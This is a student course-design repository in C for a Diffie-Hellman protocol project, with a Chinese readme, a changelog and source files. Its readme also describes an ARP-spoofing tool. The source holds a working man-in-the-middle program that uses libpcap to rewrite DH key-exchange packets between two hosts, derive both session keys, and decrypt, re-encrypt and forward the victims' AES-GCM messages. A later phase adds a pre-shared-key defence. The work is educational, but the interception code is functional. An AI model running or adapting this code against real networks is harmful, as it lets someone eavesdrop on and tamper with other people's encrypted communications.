readme.md

# 中间人攻击

> 本代码仅供交流和学习，由其他使用方法引发的纠纷与作者无关 

## 需求

### 第一阶段：`Diffie-Hellman` 协议的实现

1. 客户端与服务器之间通过` TCP Socket `通信；

2. 客户端与服务器之间通过 `Diffie-Hellman` 协议协商出对称密钥；

3. 客户端使用协商出的对称密钥对传输内容做加密，并发送给服务端； 

4. 服务端接受客户端发送过来的内容，进行解密；

5. 对称加密算法采用 `AES256-GCM`；

   ```c
   typedef struct dh_head{
       uint8_t type;
       uint8_t para_size;
   }DH_HEAD;
   typedef struct dh_body_item{
       uint8_t item_length;
       char item[256];
   }DH_BODY_ITEM;
   typedef struct dh_body{
       DH_BODY_ITEM body_item[256];
       uint8_t valid_length;
   }DH_BODY;
   typedef struct dh_mes{
       DH_HEAD head;
       DH_BODY body;
   }DH_MES;
   ```

   

### 第二阶段：`Diffie-Hellman` 中间人攻击方法研究与实现 

研究 `Diffie-Hellman `协议，研究中间人攻击方法并完成相关代码。当通信双方进行通信时，中间人攻击程序可以解密出传输内容；

### 第三阶段：`Diffie-Hellman` 协议改进 

基于预共享密钥的方式对 `Diffie-Hellman `做改进，使协议抵抗中间人攻击。完成协议设计，实现代码并用第 2 阶段的中间人攻击程序做验证

## 需求分析

1. `TCP`并发服务器和客户端
2. 日志系统设计(所有的输出采用日志，用控制字符加上颜色)
3. 加解密函数以及大数类设计
4. 协议设计
5. 中间人攻击(一种可能会成功的方法，用`NIDS`去做)
   1. 原始套接字编程 发送特定TCP报文，截获TCP连接。
      1. C网卡开启混杂模式
      2. 当检测到A到B的SYN报文时，向A发`SYNACK`，同时等待B返回的`SYNACK`
      3. 当得到B返回的`SYNACK`以及A返回的`ACK`，TCP截获就完成了
   2. 完成TCP连接截获后，分别和A和B建立连接，整个过程就完成了
   3. 这里的关键就是：如何确保C发送伪造报文比A和B快
6. 中间人攻击：`ARP欺骗`，这个好像更好实现一点

7. `PSK`

## 概要设计

1. 使用函数库
   1. 加密/解密/DH协议模拟: `openssl`
   2. 抓包/解包：`libpcap`或者`libnids`
   3. `ARP`欺骗：先用命令行(`arpspoof`)模拟，再用C语言实现
2. 公共模块设计
   1. 协议解析和生成模块
   2. 日志模块

## 协议设计

| 位置 | 字段名称 | 说明                                                         |
| ---- | -------- | ------------------------------------------------------------ |
| +0   | 类型     | 报文头，说明本条报文的类型                                   |
| +1   | 参数长度 | 报文头，说明本条报文的字段数量                               |
| +2   | 数据区   | 由参数长度个数据组成，其中包括数据项长度(1字节)n和数据项(n字节)，如`"\x05hello"` |

## 协议规定的报文类型之后在做讨论

```c
typedef enum {
    HEARTBREAK_REQ,
    HEARTBREAK_RES,
    // ...
} DH_MSG_TYPE;
const char MSG[255][16] = {
    "heartbreak request",
    ""
}
printf("%d, %s", a->type, MSG[a->type]);
```



### 心跳包请求(已弃用)

| 位置 | 字段值 | 说明                         |
| ---- | ------ | ---------------------------- |
| +0   | 0x01   | 发送心跳包                   |
| +1   | 0x00   | 无参数，验证连接存在         |
|      | 0x01   | 带认证参数，证明对端连接正常 |

### 心跳包应答(已弃用)

| 位置 | 字段值 | 说明                               |
| ---- | ------ | ---------------------------------- |
| +0   | 0x02   | 心跳包响应                         |
| +1   | 0x00   | 无参数                             |
|      | 0x01   | 带计算后的字符串，证明对端连接正常 |

### 请求协商密钥

| 位置 | 字段值 | 说明          |
| ---- | ------ | ------------- |
| +0   | 0x03   | 请求协商密钥  |
| +1   | 0x03   | 参数为g, p, A |

### 回应协商密钥

| 位置 | 字段值 | 说明         |
| ---- | ------ | ------------ |
| +0   | 0x02   | 请求协商密钥 |
| +1   | 0x01   | 参数为B      |

### 密钥协商成功标志

| 位置 | 字段值 | 说明           |
| ---- | ------ | -------------- |
| +0   | 0x05   | 密钥协商成功   |
| +1   | 0x00   | 无参数         |
|      | 0x01   | 可附加一条消息 |

### 会话报文

| 位置 | 字段值 | 说明     |
| ---- | ------ | -------- |
| +0   | 0x06   | 会话报文 |
| +1   | 0x01   | 消息内容 |

### 失败报文

| 位置 | 字段值 | 说明                           |
| ---- | ------ | ------------------------------ |
| +0   | 0xff   | 失败报文                       |
| +1   | 0x00   | 无参数，默认输出日志“ failed ” |
|      | 0x01   | 错误标志字                     |

---

## 编译
```sh
./rebuild.sh
```

## 运行

### 运行通信程序

> 基于DH协议的安全通信程序

```sh
## server
cd ./bin
./server [ip] [port]

## client
cd ./bin
./client [ip] [port]
```

### 运行安全通信程序

> 基于DH协议和PSK的安全通信协议 psk两方传的一定要一样

```sh
## server
cd ./bin
./server_safe [psk] [ip] [port]
## client
cd ./bin
./client_safe [psk] [ip] [port]
```

### arp欺骗

```sh
## arp_spoof
cd ./bin
./arp_spoof ip1 ip2
```

### 中间人攻击

```sh
cd ./bin
./man_in_middle

Changelog
# COURSE_DESIGN_CHANGE_LOG

## 2021.07.09 START

1. 搭建LINUX开发环境, 安装`OPENSSL`函数库用于加解密等

## 2021.07.12-2021.07.15

1. 参加夏令营

## 2021.07.18 MID

1. 完成基础的协议设计\(王旭\)
2. 完成ARP攻击, 可实现对同一子网下的两台主机进行ARP攻击

## 2021.07.20

1. 完成第二阶段任务：中间人攻击


test/test1.c
// /**
//  * @filename: test1.c
//  * @brief: 读取文件/proc/net/arp 以获取ip对应的mac地址
//  */

// #include <stdio.h>
// #include <stdlib.h>
// #include <stdbool.h>
// #include <string.h>
// #define DEBUG_FLAG
// #define MAX_TABLE_SIZE 128
// #define MAX_KEY_LENGTH 18
// #define MAX_VALUE_LENGTH 18

// typedef struct pair{
//     char key[MAX_KEY_LENGTH];
//     char value[MAX_KEY_LENGTH];
// }Pair, ARPItem;

// typedef struct a_table{
//     ARPItem arp_items[MAX_TABLE_SIZE];
//     size_t size;
// }ARPTable;

// void init_table(struct a_table* table){
//     memset(table, 0, sizeof(struct a_table));
// }

// int insert_into_table(struct a_table* table, char* key, char* value){
//     if(table == NULL || key == NULL){
//         printf("insert error: table or key is null\n");
//         return -1;
//     }else if(table->size >= MAX_TABLE_SIZE){
//         printf("insert error: table is full\n");
//         return -2;
//     }else{
//         size_t key_length = strlen(key);
//         size_t value_length = strlen(value);
//         if(key_length >= MAX_KEY_LENGTH || value_length >= MAX_VALUE_LENGTH){
//             printf("insert error: key or value str is too long...(%ld, %ld)\n", key_length, value_length);
//             return -3;
//         } 
//         memcpy(table->arp_items[table->size].key, key, key_length);
//         memcpy(table->arp_items[table->size].value, value, value_length);
//         return ++table->size;
//     }
// }

// int find_in_table(struct a_table* table, char* key){
//     if(table == NULL || key == NULL){
//         printf("find error: table or key is null\n");
//         return -2;
//     }else if(table->size == 0){
//         printf("find error: table empty\n");
//         return -3;
//     }else{
//         for(int i = 0; i < table->size; ++i){
//             if(strcmp(key, table->arp_items->key) == 0){
//                 return i;
//             }
//         }
//         return -1;
//     }
// }

// int show_table(struct a_table* table){
//     puts("==================================================================");
//     for(int i = 0; i < table->size; ++i){
//         printf("%d) %s -> %s\n", i, table->arp_items[i].key, table->arp_items[i].value);
//     }
//     puts("==================================================================");
// }

// int get_arp_table(ARPTable* arp_table){
//     FILE* fd = fopen("/proc/net/arp", "r");
//     if(fd <= 0){
//         fprintf(stderr, "open arp table failed\n");
//         return -1;
//     }else{
//         char temp_ip[MAX_KEY_LENGTH] = {0};
//         char temp_mac[MAX_VALUE_LENGTH] = {0};
//         // skip the first line
//         while(!feof(fd) && fgetc(fd) != '\n');
//         // init table
//         // read mac and ip to arp_table
//         while (!feof(fd) && (fscanf(fd, " %15[0-9.] %*s %*s %17[A-Fa-f0-9:] %*s %*s", temp_ip, temp_mac) == 2)){
//             insert_into_table(arp_table, temp_ip, temp_mac);
//             memset(temp_ip, 0, MAX_KEY_LENGTH);
//             memset(temp_mac, 0, MAX_VALUE_LENGTH);
//         }
// #ifdef DEBUG_FLAG
//         show_table(arp_table);
// #endif
//         return arp_table->size;
//     }
// }

// int main(void){
//     ARPTable arp_table;
//     init_table(&arp_table);  
//     get_arp_table(&arp_table);
//     return 0;
// }

main.c
#include "src/main.h"

char TIME_BUFF[32];

char *get_current_date_time() {
    memset(TIME_BUFF, 0, sizeof(TIME_BUFF));
    time_t tt = time(0);
    strftime(TIME_BUFF, sizeof(TIME_BUFF), "%Y-%m-%d %H:%M:%S", localtime(&tt));
    return TIME_BUFF;
}

void show_packet(const u_char *pkt_buff, size_t size) {
    printf("got packet: %ld bytes\n", size);
    puts("=================================================");
    if (size <= 0) {
        printf("[error], packet size error");
        return;
    }
    for (int i = 0; i < size; ++i) {
        if (i != 0) {
            if (i % 16 == 0) {
                puts("");
            } else if (i % 8 == 0) {
                printf("| ");
            }
        }

        printf("%02x ", pkt_buff[i]);
    }
    puts("\n=================================================");
}

#ifdef NORMAL_COMM_MODE
#define TEST_IP "192.168.234.131"
#define TEST_PORT 8631

#include "src/dh_comm.h"

#ifndef USE_PSK

int main(int argc, char *argv[]) {
    char ip[16] = {0};
    size_t len_ip = strlen(TEST_IP);
    strcpy(ip, TEST_IP);
    ushort port = TEST_PORT;
    if (argc >= 2) {
        if (len_ip > 16) {
            fprintf(stderr, "error: given ip is too long");
            return -1;
        }
        // ip
        memset(ip, 0, 16);
        memcpy(ip, argv[1], strlen(argv[1]));
    }
    if (argc >= 3) {
        // port
        port = strtoul(argv[2], NULL, 10);
    }
#ifdef SERVER
    if (argc >= 4) {
        puts("usage: ./server [ip] [port]");
        return 0;
    }
    server(ip, port);
#elif defined(CLIENT)
    if (argc >= 4) {
        puts("usage: ./client [ip] [port]");
        return 0;
    }
    client(ip, port);
#endif
}

#else

int main(int argc, char *argv[]) {
    char ip[16] = {0};
    size_t len_ip = strlen(TEST_IP);
    strcpy(ip, TEST_IP);
    ushort port = TEST_PORT;
    char psk[32] = "634umfnyfry7ct476t674f35y3sw9xtw";
    if (argc >= 2) {
        memcpy(psk, argv[1], 32);
    }
    if (argc >= 3) {
        if (len_ip > 16) {
            fprintf(stderr, "error: given ip is too long");
            return -1;
        }
        // ip
        memset(ip, 0, 16);
        memcpy(ip, argv[2], strlen(argv[2]));
    }
    if (argc >= 4) {
        // port
        port = strtoul(argv[3], NULL, 10);
    }

#ifdef SERVER
    if (argc >= 5) {
        puts("usage: ./server_safe [psk] [ip] [port]");
        return 0;
    }
    server(ip, port, psk);
#elif defined(CLIENT)
    if (argc >= 5) {
        puts("usage: ./client_safe [psk] [ip] [port]");
        return 0;
    }
    client(ip, port, psk);
#endif
}

#endif

#elif defined(ARP_SPOOF_MODE)

#include "src/arpspoof.h"


int main(int argc, char *argv[]) {
    char ip_list[2][16] = {
            VICTIM_A,
            VICTIM_B
    };
    if (argc >= 2) {
        size_t ip_victim_a = strlen(argv[1]);
        if (ip_victim_a > 15) {
            ip_victim_a = 15;
        }
        memset(ip_list[0], 0, 16);
        memcpy(ip_list[0], argv[1], ip_victim_a);
    }
    if (argc >= 3) {
        size_t ip_victim_b = strlen(argv[2]);
        if (ip_victim_b > 15) {
            ip_victim_b = 15;
        }
        memset(ip_list[1], 0, 16);
        memcpy(ip_list[1], argv[2], ip_victim_b);
    }

    if(argc >= 4){
        puts("usage: ./arp_spoof [ip1] [ip2]");
        return 0;
    }
    arp_spoof_flood(ip_list, 10000, -1);
    return 0;
}

#elif defined(MAN_IN_MIDDLE_MODE)

#include "src/man_in_middle.h"

const u_char VICTIM_A_MAC[6] = {0x00, 0x0c, 0x29, 0x52, 0x8c, 0x17};
const u_char VICTIM_B_MAC[6] = {0x00, 0x0c, 0x29, 0xea, 0x23, 0x21};
const u_char ATTACKER_MAC[6] = {0x00, 0x50, 0x56, 0xc0, 0x00, 0x08}; // attacker


int main() {
    man_in_middle();
}

#else

int main() {
    printf("invalid configuration...\n");
}

#endif



src/dh_comm.h
#ifndef DIFFIE_HELLMAN_DH_COMM_H
#define DIFFIE_HELLMAN_DH_COMM_H

#include "dh_protocol.h"

typedef struct thread_args {
    int client_socket;
    bool *run_flag;
    u_char key[32];
} THREAD_ARGS;
// ==========================server=======================
/**
 * @return server's listen_fd
 */
int server_init(const char *bind_ip IN_ARG, u_short bind_port IN_ARG);

/**
 * @return client's sock_fd
 */
int client_init(const char *serv_ip IN_ARG, u_short serv_port IN_ARG);

/**
 * 
 * @brief 接收线程定义
 */
void *recv_thread(void *args IN_ARG);

/**
 * @brief 使用套接字开始回话，并使用shared_key对通信数据加密和解密。
 */
int start_dialog(int sock_fd IN_ARG, u_char *shared_key IN_ARG);

/**
 * server' msg read wrapper
 */
int recv_msg(int client_fd IN_ARG, char *buf OUT_ARG, size_t size IN_ARG);

/**
 * server' msg write wrapper
 */
int send_msg(int client_fd IN_ARG, char *buf OUT_ARG, size_t size IN_ARG);

/**
 * never return until error or received 'q'
 */
#ifndef USE_PSK
int server(const char *bind_ip IN_ARG, u_short bind_port IN_ARG);
#else

int server(const char *bind_ip IN_ARG, u_short bind_port IN_ARG, const char *psk);

#endif

/**
 * never return until client send 'q' to server
 */
#ifndef USE_PSK
int client(const char *serv_ip IN_ARG, u_short serv_port IN_ARG);
#else

int client(const char *serv_ip IN_ARG, u_short serv_port IN_ARG, const char *psk);

#endif

void check_received_msg(const char *text);


#endif // DIFFIE_HELLMAN_DH_COMM_H

src/man_in_middle.c
//
// Created by bing on 2021/7/18.
//

#include "man_in_middle.h"
#include "dh_protocol.h"   // for man-in-middle attack

// keys buffer
bool has_keys = false;
// save parameters for key generating [ C -> A ]
DH *DH4CLIENT2ATTACKER = NULL;
DH_MSG DH_MSG4CLIENT2ATTACKER = {0};
u_char KEY4CLIENT2ATTACKER[64] = {0};
// save parameters for key generating [ A-> S ]
DH *DH4ATTACKER2SERVER = NULL;
DH_MSG DH_MSG4ATTACKER2SERVER = {0};
u_char KEY4ATTACKER2SERVER[64] = {0};

u_char MAN_IN_MIDDLE_PACKET_COPY[MAX_PACKET_COPY_SIZE] = {0};

u_short checksum(u_short *buffer, u_short size) {
    unsigned long chksum = 0;
    while (size > 1) {
        chksum += *buffer++;
        size -= sizeof(u_short);
    }
    if (size) {
        chksum += *(u_char *) buffer;
    }
    chksum = (chksum >> 16) + (chksum & 0xffff);  //将高16bit与低16bit相加
    chksum += (chksum >> 16);             //将进位到高位的16bit与低16bit 再相加
    return (u_short) (~chksum);
}

u_short tcp_checksum(u_char *tcp_packet, u_short size, uint ip_src, uint ip_dst) {
    // pkt_buff is the ethernet frame, size = pkthdr.len - sizeof(ether_hdr) - sizeof(ip_hdr);
    u_char tcp_checksum_buffer[2048] = {0};
    PSD_TCP_HEADER psd_tcp_header = {ip_src, ip_dst, 0x00, 0x06, htons(size)};
    memcpy(tcp_checksum_buffer, &psd_tcp_header, sizeof(PSD_TCP_HEADER));
    memcpy(tcp_checksum_buffer + sizeof(PSD_TCP_HEADER), tcp_packet, size);
#ifdef DEBUG_FLAG
    puts("checksum: ");
    show_packet(tcp_checksum_buffer, size + sizeof(PSD_TCP_HEADER));
#endif
    return checksum((u_short *) (tcp_checksum_buffer), size + sizeof(PSD_TCP_HEADER));
}

void print_key_and_generate_parameters(u_char *key, DH_MSG *dh_msg, DH *dh) {
    dh_show_message(dh_msg);
    BIO *b;
    b = BIO_new(BIO_s_file());
    BIO_set_fp(b, stdout, BIO_NOCLOSE);
    DHparams_print(b, dh);
    BIO_free(b);
    BIGNUM *temp = NULL;
    temp = BN_bin2bn(key, 32, NULL);
    char *hex_key = NULL;
    hex_key = BN_bn2hex(temp);
    fputs("the key is: ", stdout);
    puts(hex_key);
}


void pkt_hdl4man_in_middle(u_char *args, const struct pcap_pkthdr *pkthdr, const u_char *pkt_buff) {
    // 定义以太网帧头部, IP头部和 TCP头部数据
    struct ether_hdr eth_hdr = {0};
    struct ip_header ip_hdr = {0};
    struct tcp_header tcp_hdr = {0};
    // 初始化HTTP结构体
    int header_length = sizeof(struct ether_hdr) + sizeof(struct ip_header) + sizeof(struct tcp_header);
    // 获取以太网帧头部,IP头部, TCP头部
    memcpy(&eth_hdr, pkt_buff, sizeof(struct ether_hdr));
    memcpy(&ip_hdr, pkt_buff + sizeof(struct ether_hdr), sizeof(struct ip_header));
    memcpy(&tcp_hdr,
           pkt_buff + sizeof(struct ether_hdr) + sizeof(struct ip_header),
           sizeof(struct tcp_header)
    );
    char src_ip[16];
    char dst_ip[16];
    // read, must be tcp packet
    strcpy(src_ip, inet_ntoa(ip_hdr.ip_src));
    strcpy(dst_ip, inet_ntoa(ip_hdr.ip_dst));
    printf("[%s] info: %s:%d -> %s:%d length: %d  tcp flags: %#03x\n", get_current_date_time(), src_ip,
           ntohs(tcp_hdr.th_sport), dst_ip, ntohs(tcp_hdr.th_dport), pkthdr->len - header_length, tcp_hdr.th_flags);
    // copy to write
    memset(MAN_IN_MIDDLE_PACKET_COPY, 0, MAX_PACKET_COPY_SIZE);
    memcpy(MAN_IN_MIDDLE_PACKET_COPY, pkt_buff, pkthdr->len);
    // got tcp packet....
    u_int tcp_pkt_length = pkthdr->len - sizeof(EtherHdr) - sizeof(IPHeader);
    u_int tcp_hdr_length = (tcp_hdr.th_offset >> 4) * 4;
    u_char *tcp_pkt = MAN_IN_MIDDLE_PACKET_COPY + sizeof(EtherHdr) + sizeof(IPHeader);
    u_char *tcp_data = tcp_pkt + tcp_hdr_length;
    PCAP_HDL_ARGS *a = (PCAP_HDL_ARGS *) args;
    pcap_t *hdl = a->handle;
    PLUGIN_FUNC *plugin_func = a->plugin_func;
    // return value
    int ret; // saving return value...
    // DH_MSG buffer
    DH_MSG temp_dh_msg, temp_dh_msg_rsp;
    DH_MSG *ptr_temp_dh_msg = &temp_dh_msg;
    DH_MSG *ptr_temp_dh_msg_rsp = &temp_dh_msg_rsp;
    bool to_server = false;
    // input output buffer
    u_char in_buff[DH_BUF_SIZE];
    u_char out_buff[DH_BUF_SIZE];

    // TODO ATTENTION 1
    if (tcp_hdr.th_flags == 0x018) {
        if (strncmp((const char *) eth_hdr.dst_mac, (const char *) ATTACKER_MAC, 6) == 0) {
            // change the mac address
            if (strcmp(dst_ip, VICTIM_A) == 0) {
                memcpy(MAN_IN_MIDDLE_PACKET_COPY, VICTIM_A_MAC, 6);
                to_server = true;
            } else {
                memcpy(MAN_IN_MIDDLE_PACKET_COPY, VICTIM_B_MAC, 6);
                to_server = false;
            }
            if (tcp_data[0] == DH_KEY_EXCHANGE_REQ) {
                // if tcp_data[0] == 0x33 try to get keys again
                has_keys = false;
            }
            // judge if we have the keys
            if (has_keys == false) {
                /** we should use server's pubkey and client's user key to handle the packet
                 * we handle packet A1(0x03, g p a) from the client in this way:
                 *  1. parse the packet, got g p A save it
                 *  2. generate a new packet A2 0x03, g', p' A' send to server
                 *  3. wait for the response packet B1, got B save it
                 *  4. generate a new packet B2 0x04, B' send to client
                 *  5. KEY4CLIENT2ATTACKER = ((g  ^ A) ^ B') (mod p)
                 *  6. KEY4ATTACKER2SERVER = ((g' ^ A') ^ B) (mod p')
                 * so that, we got the keys
                 */
                memset(ptr_temp_dh_msg, 0, sizeof(DH_MSG));
                ret = dh_parse_packet(tcp_data, ptr_temp_dh_msg);
                if (!ret) {
                    fprintf(stderr, "parse packet error");
                }
                if (ptr_temp_dh_msg->head.type == DH_KEY_EXCHANGE_REQ) {
                    // 1. parse the packet, got g p A save it
                    fputs("key change request from client.\n", stdout);
                    dh_show_message(ptr_temp_dh_msg);
                    memcpy(&DH_MSG4CLIENT2ATTACKER, ptr_temp_dh_msg, sizeof(DH_MSG));
                    // 2. generate a new packet A2 0x03, g', p' A' send to server
                    DH4ATTACKER2SERVER = DH_new();
                    memset(ptr_temp_dh_msg, 0, sizeof(DH_MSG));
                    ret = dh_key_exchange_request(DH4ATTACKER2SERVER, ptr_temp_dh_msg);
                    if (!ret) {
                        fprintf(stderr, "key change request error");
                    }
                    // set message here
                    dh_cvt_dh_msg2bytes(ptr_temp_dh_msg, tcp_data, tcp_pkt_length - tcp_hdr_length);
                    // got g p A and g' p' A'
                } else if (ptr_temp_dh_msg->head.type == DH_KEY_EXCHANGE_RES) {
                    // 3. wait for the response packet B1, got B save it
                    fputs("key change response from server.\n", stdout);
                    dh_show_message(ptr_temp_dh_msg);
                    memcpy(&DH_MSG4ATTACKER2SERVER, ptr_temp_dh_msg, sizeof(DH_MSG));
                    // 4. generate a new packet B2 0x04, B' send to client
                    DH4CLIENT2ATTACKER = DH_new();
                    memset(ptr_temp_dh_msg_rsp, 0, sizeof(DH_MSG));
                    // generate
                    dh_key_exchange_response(&DH_MSG4CLIENT2ATTACKER, DH4CLIENT2ATTACKER, ptr_temp_dh_msg_rsp);
                    // set message here
                    dh_cvt_dh_msg2bytes(ptr_temp_dh_msg_rsp, tcp_data, tcp_pkt_length - tcp_hdr_length);
                    // generate the keys
                    char pubkey_str[65] = {0};
                    BIGNUM *pub_key = NULL;
                    dh_get_dh_msg_item(&DH_MSG4CLIENT2ATTACKER, 2, (u_char *) pubkey_str, 65);
                    BN_hex2bn(&pub_key, pubkey_str);
                    dh_generate_shared_key(DH4CLIENT2ATTACKER, pub_key, KEY4CLIENT2ATTACKER);
                    memset(pubkey_str, 0, 65);
                    dh_get_dh_msg_item(&DH_MSG4ATTACKER2SERVER, 0, (u_char *) pubkey_str, 65);
                    BN_hex2bn(&pub_key, pubkey_str);
                    dh_generate_shared_key(DH4ATTACKER2SERVER, pub_key, KEY4ATTACKER2SERVER);
                    puts("================================KEY4CLIENT2ATTACKER====================================");
                    print_key_and_generate_parameters(KEY4CLIENT2ATTACKER, &DH_MSG4CLIENT2ATTACKER, DH4CLIENT2ATTACKER);
                    puts("================================KEY4ATTACKER2SERVER====================================");
                    print_key_and_generate_parameters(KEY4ATTACKER2SERVER, &DH_MSG4ATTACKER2SERVER, DH4ATTACKER2SERVER);
                    puts("=======================================================================================");
                    fflush(stderr);
                    fflush(stdout);
                    // set flag has_keys
                    has_keys = true;
                } else {
                    fprintf(stderr, "\nfail, can't got keys...\n");
                }
            } else {
                memset(ptr_temp_dh_msg, 0, sizeof(DH_MSG));
                dh_parse_packet(tcp_data, ptr_temp_dh_msg);
                // communicate between client and server
                memset(out_buff, 0, DH_BUF_SIZE);
                memset(in_buff, 0, DH_BUF_SIZE);
                if (to_server) {
                    dh_aes_256_gcm_decrypt(KEY4CLIENT2ATTACKER, tcp_data + 3, *(tcp_data + 2), out_buff);
                    printf("\033[1;36mreceived from client: %s(%ld), send to server\n\033[0m",
                           out_buff, strlen((char *) out_buff));
                    plugin_func(out_buff, strlen((char *) out_buff));
                    dh_aes_256_gcm_encrypt(KEY4ATTACKER2SERVER, out_buff, strlen((char *) out_buff), tcp_data + 3);
                } else {
                    dh_aes_256_gcm_decrypt(KEY4ATTACKER2SERVER, tcp_data + 3, *(tcp_data + 2), out_buff);
                    printf("\033[1;32mreceived from server: %s(%ld), send to client\n\033[0m",
                           out_buff, strlen((char *) out_buff));
                    plugin_func(out_buff, strlen((char *) out_buff));
                    dh_aes_256_gcm_encrypt(KEY4CLIENT2ATTACKER, out_buff, strlen((char *) out_buff), tcp_data + 3);
                }
            }
            // recalculate the packet
            memcpy(tcp_pkt + 16, "\x00", 2);
            u_short tcp_chksum = tcp_checksum(tcp_pkt, tcp_pkt_length, ip_hdr.ip_src.s_addr,
                                              ip_hdr.ip_dst.s_addr);
            memcpy(tcp_pkt + 16, &tcp_chksum, 2);
            memcpy(MAN_IN_MIDDLE_PACKET_COPY + sizeof(EtherHdr) + sizeof(IPHeader), tcp_pkt, tcp_pkt_length);
            // send to server
            pcap_sendpacket(hdl, MAN_IN_MIDDLE_PACKET_COPY,
                            (int) (sizeof(EtherHdr) + sizeof(IPHeader) + tcp_pkt_length));
        }
    } else {
        // just transfer...
        if (strncmp((const char *) eth_hdr.dst_mac, (const char *) ATTACKER_MAC, 6) == 0) {
            if (strcmp(dst_ip, VICTIM_A) == 0) {
                memcpy(MAN_IN_MIDDLE_PACKET_COPY, VICTIM_A_MAC, 6);
            } else {
                memcpy(MAN_IN_MIDDLE_PACKET_COPY, VICTIM_B_MAC, 6);
            }
            pcap_sendpacket(hdl, MAN_IN_MIDDLE_PACKET_COPY, (int) pkthdr->len);
        } else {
            // do nothing
        }
        printf("\n");
    }
#ifdef DEBUG_FLAG
    puts("\nwill send packet: ");
    show_packet(MAN_IN_MIDDLE_PACKET_COPY, (int) pkthdr->len);
#endif
    fflush(stderr);
    fflush(stdout);
}

int man_in_middle() {
    // variables
    pcap_t *handle;
    char errbuf[PCAP_BUF_SIZE];
    struct bpf_program fp;
    char bpf_filter_str[120] = {0};
    // wrong bpf filter expression...wu wu wu two hours for this....
    sprintf(bpf_filter_str, "((dst %s && src %s) || (src %s && dst %s)) and tcp", VICTIM_A, VICTIM_B, VICTIM_A,
            VICTIM_B);
    printf("bpf filter: %s\n", bpf_filter_str);
    // get and print network interface device and it's net...
    bpf_u_int32 mask, net;
    if (pcap_lookupnet(DEVICE_NAME, &net, &mask, errbuf) == -1) {
        fprintf(stderr, "could not get netmask for device %s: %s\n", DEVICE_NAME, errbuf);
        return -2;
    }
    struct in_addr temp_in_addr;
    char net_str[16];
    char mask_str[16];
    temp_in_addr.s_addr = net;
    strcpy(net_str, inet_ntoa(temp_in_addr));
    temp_in_addr.s_addr = mask;
    strcpy(mask_str, inet_ntoa(temp_in_addr));
    fprintf(stdout, "found device: %s<%s><%s>\n", DEVICE_NAME, net_str, mask_str);
    // non-promise mode
    if ((handle = pcap_open_live(DEVICE_NAME, BUFSIZ, 0, 100, errbuf)) == NULL) {
        fprintf(stderr, "could not open the device: %s: %s\n", DEVICE_NAME, errbuf);
        return -3;
    }
    // compile
    if (pcap_compile(handle, &fp, bpf_filter_str, 0, net) == -1) {
        fprintf(stderr, "could not parse filter %s: %s\n", bpf_filter_str, pcap_geterr(handle));
        pcap_close(handle);
        return -4;
    }
    if (pcap_setfilter(handle, &fp) == -1) {
        fprintf(stderr, "could not install filter %s: %s\n", bpf_filter_str, pcap_geterr(handle));
        pcap_close(handle);
        return -5;
    }
    // load plugins
    PLUGIN_FUNC *plugin_func = do_nothing;
    char plugin_desc[256];
    void *dl_handle = load_plugin_func("../lib/libman_in_middle_plugin.so", plugin_desc, 256, &plugin_func);
    printf("plugin handle: %p, func address: %p\n", dl_handle, plugin_func);
    printf("plugin desc: %s\n", plugin_desc);
    PCAP_HDL_ARGS pcap_hdl_args = {0};
    pcap_hdl_args.handle = handle;
    pcap_hdl_args.plugin_func = plugin_func;
    fflush(stderr);
    fflush(stdout);
    pcap_loop(handle, -1, pkt_hdl4man_in_middle, (u_char *) &pcap_hdl_args);
    dlclose(dl_handle);
    return 0;
}

void *load_plugin_func(const char *file_name, char *desc, size_t desc_size, PLUGIN_FUNC **func) {
    void *handle;
    char *error;

    handle = dlopen(file_name, RTLD_LAZY);
    if (!handle) {
        fprintf(stderr, "%s ", dlerror());
        return NULL;
    }

    PLUGIN_DESC_FUNC *temp_desc = (PLUGIN_DESC_FUNC *) dlsym(handle, "plugin_desc");
    error = dlerror();
    if (error != NULL) {
        fprintf(stderr, "load_plugin_func() load desc error: %s\n", error);
        fflush(stderr);
        return handle;
    }

    PLUGIN_FUNC *temp_func = (PLUGIN_FUNC *) dlsym(handle, "plugin_func");
    error = dlerror();
    if (error != NULL) {
        fprintf(stderr, "load_plugin_func() load desc error: %s\n", error);
        fflush(stderr);
        return handle;
    }
    const char *g_desc = temp_desc();
    size_t size = strlen(g_desc);
    memcpy(desc, g_desc, desc_size > size ? desc_size : size);
    *func = temp_func;
    return handle;
}

void do_nothing(unsigned char *tcp_data, unsigned char size) {
    puts("function do_nothing() called!");
}
